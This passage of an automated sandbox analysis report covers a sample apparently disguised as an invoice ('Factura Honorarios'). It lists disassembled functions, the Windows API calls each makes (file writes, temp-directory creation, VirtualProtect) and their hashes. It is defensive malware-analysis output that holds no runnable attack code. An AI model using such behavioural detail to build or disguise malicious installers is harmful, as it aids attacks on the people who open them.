                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                  Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                  • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                  • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                                                                                  Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                  • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                  • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                                                                                  Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileMove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3562171763-0
                                                                                                                                  • Opcode ID: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
                                                                                                                                  • Instruction ID: d123e8d396e713de7048fa64f9ea280ab7714f4756ad7edd7a8c63d0e13ac4ca
                                                                                                                                  • Opcode Fuzzy Hash: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
                                                                                                                                  • Instruction Fuzzy Hash: 16F09031A08510A7DB20ABB54F4DD5F22949B82369B28073BB812B21E1DAFDC54259AE
                                                                                                                                  Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 390214022-0
                                                                                                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                                                  Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                  • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                  • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                                                                  Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                  • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                  • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                                                                                  Function 6FF42997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(6FF4405C,00000004,00000040,6FF4404C), ref: 6FF429B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 33804326fe32ad409ff3d65dff627f603f6d2aeca9f8446155268e19253dd248
                                                                                                                                  • Instruction ID: c1c41d7f68ab200e43659f3aa0bd05cbcaad23d095c380b51054e7055a384735
                                                                                                                                  • Opcode Fuzzy Hash: 33804326fe32ad409ff3d65dff627f603f6d2aeca9f8446155268e19253dd248
                                                                                                                                  • Instruction Fuzzy Hash: 58F0A5B1528A80DEEB60EF6C84457053FE0F76A324B01452AE9A8F6363E33540BCDB11
                                                                                                                                  Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                                                  • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                                                                                  • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                                                  • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                                                                                  Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                  Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                                                  • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                                                                                  • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                                                  • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                                                                                  Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                  • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                                                                  • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                                                                                  • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
